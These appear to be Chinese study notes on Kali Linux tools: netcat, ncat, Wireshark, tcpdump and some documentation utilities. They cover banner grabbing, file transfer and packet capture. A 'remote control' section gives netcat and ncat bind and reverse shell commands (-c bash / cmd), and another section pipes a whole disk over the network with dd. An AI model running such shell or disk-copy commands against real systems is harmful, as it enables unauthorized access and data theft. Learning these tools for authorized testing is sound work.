Kali基本工具学习

netcat–nc

• 侦听模式/传输模式
• telnet/获取banner信息
• 传输文本信息
• 传输文件/目录
• 加密传输文件
• 远程控制/木马
• 加密所有流量
• 流媒体服务器
• 远程克隆硬盘

telnet 远程登录
banner信息 横幅广告，用于表明端口的身份，显示欢迎信息
nc -nv ip 端口

传输文本信息
A:nc -l -p 4444 -l 侦听，-p 指定端口
B:nc -nv 1.1.1.1 4444
可用于远程电子取证信息收集

传输文件
A：nc -lp 333 > 1.mp4 侦听333端口，将侦听到的内容输出到1.mp4
B：nc -nv 1.1.1.1 333 <1.mp4 -q 1 连接333端口，传入1.mp4，-q 1传递完后1s自动退出
或
A：nc -lp 333 B：nc -nv 1.1.1.1 333 >2.mp4

传输目录
A：tar -cvf - music/ | nc -lp 333 -q 1将目录打包成一个文件，再传输
B： nc -nv 1.1.1.1 333 | tar -xvf –接收文件，解包

加密传输文件
A：nc -lp 333 | mcrypt -flush -Fbqd -a rijndael-256 -m ecb >1.mp4
B：mcrypt –flush -Fbq -a rijndael-256 -m ecb

远程控制
A：nc -lp 333 -c bash
B：nc 1.1.1. 333
或
A：nc -lp 333
B：1.1.1.1 333 -c bash
注：windows用户把bash改成cmd

流媒体服务器
A：cat 1.mp4 | nc -lp 333
B：1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

远程克隆硬盘
A：nc -lp 333 | dd of=/dev/sda
B：DD if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

端口扫描
nc -nvz 1.1.1.1 1-65535-z扫描模式(默认只扫描tcp的端口)
nc -vnzu 1.1.1.1 1-1024-u（扫描udp的端口）

nc的缺陷
缺乏加密和身份验证的能力

ncat

包含于nmap工具包中
A: ncat -c bash –allow 192.168.20.14 -vnl 333 –ssl
B：ncat -nv 1.1.1.1 333 –ssl
nc在不同系统/平台的版本可能不同，参数有变化

Wireshark

抓包工具
选择抓包网卡 个人电脑通常会有一个以太网网卡和无线网网卡，服务器可能有多个网卡
混杂模式 会抓取所有经过网卡的数据包
实时抓包
保存和分析捕获文件
抓包筛选器
显示筛选器

常见协议包
数据包的分层结构
Arp,lcmp,UDP,dns,
http/https
ftp
TCP(三次握手)
数据流

信息统计：
节点数、协议分布、包大小分布、会话连接、解码方式、专家系统

抓包对比nc、ncat加密与不加密的流量

企业抓包部署方案(全流量抓包)：Sniffer、Cace/riverbed

Tcpdump

No-GUI的抓包分析工具
Linux、Unix系统默认安装
默认只抓68个字节
tcpdump -i eth0 -s 0 -w file.pcap
Tcpdump -i eth0 part 22
筛选，高级筛选

Dradis

短期临时小团队资源共享
各种插件导入文件

Keepnote 文档记录软件

Truecrypt文件加密工具

windows、linux都有